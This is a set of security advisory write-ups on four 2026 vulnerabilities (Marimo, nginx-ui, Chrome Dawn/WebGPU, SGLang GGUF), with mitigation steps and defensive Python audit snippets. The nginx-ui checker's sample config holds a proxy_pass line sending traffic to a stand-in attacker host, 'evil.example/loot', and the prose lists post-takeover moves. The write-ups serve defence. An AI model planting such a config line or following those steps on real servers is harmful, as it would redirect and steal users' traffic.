A pre-authenticated remote code execution flaw in the Marimo Python notebook (CVSS 9.3) was weaponized and actively exploited within ten hours of public disclosure. Here's what happened and how to respond.

On April 10, 2026, maintainers of Marimo — the popular open-source Python notebook — published an advisory for CVE-2026-39987, a pre-authenticated remote code execution vulnerability scoring 9.3 on CVSS. Less than ten hours later, exploitation was observed in the wild, with attackers deploying a new variant of the cross-platform NKAbuse malware family onto compromised hosts.
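Before the details, one fast triage step for the most common exposure pattern: a notebook server listening beyond loopback. A stdlib sketch; the port set is an assumption (2718 is marimo's usual default, plus common notebook ports), and the bindings would come from ss -ltn output or an asset inventory.

```python
import ipaddress

# Assumed defaults: marimo's 2718 plus common notebook/dev-server ports.
NOTEBOOK_PORTS = {2718, 8888, 8080}

def exposed_listeners(bindings):
    """Given (address, port) pairs from `ss -ltn` or an inventory export,
    return the notebook listeners reachable from off-host."""
    flagged = []
    for addr, port in bindings:
        if port not in NOTEBOOK_PORTS:
            continue
        ip = ipaddress.ip_address(addr)
        # 0.0.0.0, ::, and any LAN address all count as exposed.
        if not ip.is_loopback:
            flagged.append((addr, port))
    return flagged

print(exposed_listeners([
    ("127.0.0.1", 2718),   # safe: loopback only
    ("0.0.0.0", 2718),     # exposed: listening on every interface
    ("0.0.0.0", 5432),     # ignored: not a notebook port
]))   # [('0.0.0.0', 2718)]
```

Anything this flags on a laptop or CI runner deserves the same ingress scrutiny as a server.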
###### The vulnerability

CVE-2026-39987 allows an unauthenticated remote attacker to execute arbitrary code on any reachable Marimo notebook server. Because Marimo is commonly exposed on internal developer machines, CI runners, and increasingly on managed notebook platforms, the effective attack surface is considerably wider than the "just a notebook tool" framing suggests.

###### Ten hours from advisory to exploitation

The time-to-exploitation window is the part of this story worth internalizing. Ten hours is not enough time to:

- Wait for the next weekly patch cycle.
- Route a fix through a multi-team change advisory board.
- Regression-test the patch across a full CI matrix.
- Work through a backlog of dependency advisories.

It is, however, more than enough time for an attacker with a working proof-of-concept to scan the public internet and common internal exposure patterns, drop a payload, and establish persistence. If your incident response playbook implicitly assumes days rather than hours, that assumption will be tested at every subsequent zero-day.

> "Ten hours" is the new planning baseline for any pre-auth RCE with a working PoC. Build the pipeline for that, not for the leisurely case.

###### Who is affected

Any organization running Marimo as part of its data science, research, or ML development workflow should assume exposure until proven otherwise. Particular attention:

- Shared notebook servers reachable on internal networks without strict ingress controls.
- CI runners that invoke Marimo during build or test stages.
- Container images baked with Marimo for reproducible research environments.
- Developer laptops running a local notebook server bound to a non-loopback interface.

###### Mitigation

Upgrade to the patched release identified in the upstream advisory. Until that upgrade is verified across all deployments, at minimum:

- Remove external network exposure — close the port, add a WAF rule, or shut down non-essential instances.
- Inspect outbound network logs for connections matching NKAbuse command-and-control patterns.
- Audit process trees, systemd units, and cron entries on Marimo hosts for unexpected persistence.
- Rotate any credentials that may have been accessible from the Marimo process environment.

###### The broader pattern

This incident is not an outlier. The velocity of exploitation for publicly disclosed pre-auth vulnerabilities has been compressing for years — from months, to weeks, to days, and now to hours. The defensive implication is unavoidable: organizations that ship code without continuous software composition analysis, a live vulnerability management pipeline, and a rehearsed patch workflow are, on any given day, one CVE publication away from a public incident. If you have not recently verified your SCA coverage across Python environments — including notebook tooling — this week is a reasonable time to do so.

---

# CVE-2026-33032: Authentication bypass in nginx-ui takes over 2,600+ servers

URL: https://keepsecure.io/hub/cve-2026-33032-nginx-ui-auth-bypass-mcpwn
Published: 2026-04-22
CVE: CVE-2026-33032
CVSS: 9.8
Product: nginx-ui
Type: Auth bypass → Nginx RCE
Disclosed: 2026-04-08
Tags: nginx-ui, auth bypass, management plane, unauthenticated RCE, MCPwn

A critical authentication bypass in nginx-ui (CVSS 9.8) — dubbed 'MCPwn' by researchers — enables full takeover of the underlying Nginx service and the host it runs on. Over 2,600 exposed instances have been identified.

Nginx itself is not vulnerable. nginx-ui — the popular web-based management panel used to configure Nginx without hand-editing config files — is. CVE-2026-33032, rated 9.8 on CVSS and codenamed MCPwn by Pluto Security, lets an unauthenticated attacker bypass login entirely and reach the same administrative surface a logged-in operator would. At least 2,600 publicly reachable instances are already exposed; active exploitation is confirmed.
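One concrete triage step for a panel like this: diff the proxy_pass targets actually present in the config tree against the set you deliberately configured, since a silently added upstream is a classic artifact of a panel takeover. A stdlib sketch; the approved set and the *.conf naming convention are assumptions about your layout.

```python
import re
from pathlib import Path

PROXY_RE = re.compile(r"proxy_pass\s+\w+://([^/;:\s]+)")

def proxy_targets(conf_text):
    """Extract upstream hosts named in proxy_pass directives."""
    return set(PROXY_RE.findall(conf_text))

def unfamiliar_proxies(conf_root, approved):
    """Walk a config tree; report upstream hosts outside the approved set."""
    hits = {}
    for conf in Path(conf_root).rglob("*.conf"):
        strange = proxy_targets(conf.read_text(errors="replace")) - approved
        if strange:
            hits[str(conf)] = sorted(strange)
    return hits

snippet = """
location / { proxy_pass http://127.0.0.1:8080; }
location /cdn { proxy_pass https://evil.example/loot; }
"""
print(sorted(proxy_targets(snippet) - {"127.0.0.1"}))   # ['evil.example']
```

A clean result here is not proof of safety (config injection is only one of the takeover paths), but a hit is a strong signal worth escalating.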
###### From panel bypass to full server takeover

The severity rating reflects what the attacker actually gets. nginx-ui is designed to write Nginx configuration, reload the service, manage TLS certificates, and execute arbitrary shell commands as part of certificate provisioning hooks. An unauthenticated actor who reaches this panel can:

- Add a new server block that proxies traffic to an attacker-controlled host.
- Install a TLS certificate tied to a hook that runs shell commands at reload.
- Edit the main Nginx configuration to inject a response header, a log-to-URL rule, or a backend rewrite.
- Read any file the nginx-ui process has access to, including environment secrets passed to child processes.

The panel is, by design, a root-equivalent surface for the web tier. Removing authentication from that surface is as bad as it sounds.

> If nginx-ui is reachable from the public internet and running an unpatched version, assume compromise and rebuild the host. There is no audit log that definitively tells you "they didn't get in" — only your own network telemetry.

###### Why this keeps happening to admin panels

Every few months, a popular admin panel ships an auth bypass. Cockpit, Portainer, phpMyAdmin, Webmin, and now nginx-ui have all been on this list at some point. The pattern is consistent: a panel grows features faster than its authentication layer is hardened, and a single missing check in a middleware or a single over-permissive default route exposes the whole thing.

The defensive posture that actually works is treating admin panels as internal-only by default. If your nginx-ui, Portainer, or similar is reachable on port 443 from the internet — even with a "strong password" — you are one bypass disclosure away from a server takeover. That "one disclosure" is not a hypothetical. It is MCPwn today, something else next quarter.

###### Mitigation

Upgrade nginx-ui to the patched release from the upstream advisory.
Beyond that, apply the controls that would have blunted this regardless of the CVE:

- Remove public exposure. Put nginx-ui behind a VPN, Tailscale, Cloudflare Access, or an IP allowlist. An admin panel does not need a public IP.
- Run it as a non-root user with the narrowest sudo permissions the reload/cert hooks require, so that if takeover happens anyway, the blast radius stays small.
- Audit the config directory (/etc/nginx/ and wherever nginx-ui stores its own state) for unfamiliar server blocks, unknown TLS certs, or recent changes you did not make.
- Check outbound traffic from the Nginx host for connections to unfamiliar destinations — a common post-exploitation signal.

###### The broader pattern

This CVE fits the same trend as the others we have covered this week: the time from disclosure to mass exploitation has compressed to hours, and the affected surface is rarely the component users think of as "the security-critical one." Nginx is hardened and battle-tested. The Go web panel that writes Nginx's configuration is not. The lesson for organizations operating at scale is that the security boundary worth defending is the management plane, not just the serving plane — and the management plane should never have a public IP.

---

# CVE-2026-5281: Chrome zero-day in Dawn/WebGPU under active exploitation

URL: https://keepsecure.io/hub/cve-2026-5281-chrome-dawn-webgpu-zero-day
Published: 2026-04-22
CVE: CVE-2026-5281
CVSS: 8.8
Product: Google Chrome (Dawn / WebGPU)
Type: Use-after-free → renderer RCE
Disclosed: 2026-03-31
Tags: Chrome, WebGPU, Dawn, use-after-free, browser zero-day, Electron

A high-severity use-after-free in Chrome's Dawn WebGPU implementation is being exploited in the wild. CISA added CVE-2026-5281 to the Known Exploited Vulnerabilities catalog on April 1, 2026.

Google shipped an emergency Chrome update for CVE-2026-5281, a high-severity use-after-free in Dawn — the open-source implementation of the WebGPU standard embedded in Chrome.
A crafted HTML page can trigger the bug in the renderer process and gain arbitrary code execution inside the renderer sandbox. CISA added the CVE to its KEV catalog on April 1, 2026, confirming in-the-wild exploitation.

###### Why Dawn keeps attracting attacker attention

Dawn is a relatively new, large, GPU-adjacent codebase written in C++. It sits on the happy path of every Chrome tab that renders WebGPU content — which increasingly includes AI inference demos, ML-accelerated web apps, and browser-based games. From an attacker's perspective it is a great target: complex binary parsing, a privileged position relative to the renderer, lighter auditing than V8 gets, and reachability from a single click on a malicious link.

This is the second Dawn/WebGPU CVE in the last six months. Expect more. The WebGPU attack surface is in the same phase of the maturity curve that WebGL was in 2012–2014 — feature-rich, widely deployed, and full of findable bugs.

> A renderer RCE is not a full sandbox escape on its own, but it is the critical first link of a chain that has ended in full system compromise many times. Patch Chrome the same day it ships, not the next sprint.

###### Who is affected

- Every user of Chrome or a Chromium-based browser on versions below the patched release — Chrome, Edge, Brave, Opera, Arc, and Electron-based desktop apps bundling an older Chromium.
- Electron apps are especially relevant: Slack, Discord, VS Code, 1Password, Notion, Signal Desktop, and countless others ship their own Chromium, and their patching cadence is slower than browser auto-update. Inventory your Electron apps and confirm they have caught up.
- Managed browser fleets (Chrome Enterprise, Edge WDAC, Puppet/Intune-managed endpoints) where auto-update is disabled. Verify the rollout reached production.

###### Mitigation

- Confirm Chrome version on every endpoint. chrome://settings/help will force an update check.
- Audit Electron apps for bundled Chromium version.
If the vendor hasn't shipped an update, raise it with them and consider restricting network access for that app until they do.
- Block WebGPU in high-risk profiles via the Disable3DAPIs enterprise policy as a short-term mitigation. This breaks some ML demo sites but removes the attack surface entirely.
- Monitor for renderer crashes with unusual signatures — one of the earliest tells for in-the-wild browser exploitation.

###### The broader pattern

Chrome zero-days are, by this point, a standing item on any enterprise security operations calendar. What has changed in 2026 is the distribution channel: exploitation is no longer limited to nation-state use against specific targets. Commodity infostealers are bundling fresh browser zero-days within days of public disclosure, and using them to hoover up saved passwords, session cookies, and crypto wallet keys from anyone who browses the wrong page. The old advice — "just keep your browser updated" — remains the most important single piece of end-user security hygiene. It has never been more important.

---

# CVE-2026-5760: RCE via malicious GGUF model files in SGLang

URL: https://keepsecure.io/hub/cve-2026-5760-sglang-rce-via-malicious-gguf-models
Published: 2026-04-22
CVE: CVE-2026-5760
CVSS: 9.8
Product: SGLang
Type: RCE via malicious model file
Disclosed: 2026-04-15
Tags: SGLang, GGUF, malicious model, AI supply chain, LLM serving, ML inference

A CVSS 9.8 vulnerability in SGLang lets an attacker achieve remote code execution by crafting a malicious GGUF model file. The trust boundary has moved from 'downloaded binary' to 'downloaded weights'.

SGLang — a widely adopted serving framework for large language models — disclosed CVE-2026-5760 this month, a remote code execution vulnerability rated 9.8 on CVSS. The trigger is not a network request or a misconfigured endpoint.
It is the act of loading a model file in the GGUF format, the same format distributed across HuggingFace, Ollama registries, and countless "download this quantised model" tutorials.

###### Why this class of bug matters

Until recently, the prevailing mental model for model artifacts was "it's just weights and metadata — a big blob of floats." CVE-2026-5760 joins a growing list of vulnerabilities that invalidate that assumption. Model files are complex, versioned, extensible binary formats parsed by C/C++ code running in-process with the rest of your application. A format parser is an attack surface; a parser fed untrusted input is a vulnerability waiting to be found.

> Model weights are executable input. Treat a GGUF file from HuggingFace the way you would treat a tarball from a random GitHub gist.

###### The supply chain angle

The exploitation path does not require the attacker to compromise SGLang itself. It requires only that they publish a malicious model, name it something plausible, and wait. Typical scenarios:

- A developer searches HuggingFace for a quantised Llama or Qwen variant and pulls the highest-ranked result into a local evaluation script.
- A deployment pipeline fetches a model by name from a registry, trusting the latest version tag without provenance checks.
- A fine-tuning job mirrors a "community" checkpoint into an internal model store that is then consumed by production serving.

Any of these is enough for an attacker who owns a popular-sounding model namespace to reach code execution on a GPU host — often one with privileged access to customer data or outbound network paths.

###### Mitigation

Upgrade SGLang to the patched release from the upstream advisory. Beyond the immediate patch, this CVE is a prompt to treat model artifacts as a first-class supply-chain concern:

- Pin model sources. Fetch only from namespaces you have deliberately approved, not by name search.
- Verify provenance.
Require signed manifests or checksums tied to a known publisher. Reject unsigned artifacts in production pipelines.
- Sandbox model loading. Parse untrusted model files inside a restricted process (seccomp, gVisor, Firecracker) before promoting them to a production serving host.
- Inventory your models. The same SBOM discipline you apply to containers and libraries needs to extend to model files — name, version, publisher, checksum.

###### The broader pattern

CVE-2026-5760 is the second high-severity RCE we have covered this week in the open-source ML tooling ecosystem. This is not coincidental. As LLM infrastructure matures, its attack surface is being cataloged at the same pace as any other fast-growing stack in its early years — rapid feature velocity, tight release cycles, and parsers written under deadline. Expect more of these. Plan your patching cadence accordingly, and extend your SCA and artifact provenance controls to cover model files, not only code.

---
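The pinning and provenance bullets in the SGLang entry can be collapsed into a small pre-load gate. A sketch with its assumptions flagged: the magic/version/count header layout follows the public GGUF spec, the accepted version set and count bounds are illustrative, and passing the gate enforces provenance only; it does not make a hostile file safe to parse.

```python
import hashlib
import struct
import tempfile

KNOWN_GGUF_VERSIONS = {2, 3}   # assumption: pin to the versions you actually ship

def sha256_file(path, chunk=1 << 20):
    """Stream a large model file through SHA-256 without loading it whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def preflight(path, expected_sha256):
    """Gate a GGUF artifact before any in-process parser touches it:
    pinned checksum first, then a sanity check of the fixed-size header."""
    if sha256_file(path) != expected_sha256:
        raise ValueError("checksum does not match the pinned manifest entry")
    with open(path, "rb") as f:
        header = f.read(24)
    if len(header) < 24 or header[:4] != b"GGUF":
        raise ValueError("not a GGUF file")
    version, tensor_count, kv_count = struct.unpack_from("<IQQ", header, 4)
    if version not in KNOWN_GGUF_VERSIONS:
        raise ValueError(f"unexpected GGUF version {version}")
    if tensor_count > 1_000_000 or kv_count > 1_000_000:
        raise ValueError("implausible header counts")   # crude bounds check
    return version, tensor_count, kv_count

# Demo against a synthetic header (magic + version 3 + 10 tensors + 5 kv pairs):
fake = b"GGUF" + struct.pack("<IQQ", 3, 10, 5)
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(fake)
info = preflight(f.name, hashlib.sha256(fake).hexdigest())
print(info)   # (3, 10, 5)
```

The checksum comes from your own pinned manifest, not from the registry that served the file; pairing this gate with sandboxed parsing covers both the provenance and the parser-exploit halves of the mitigation list.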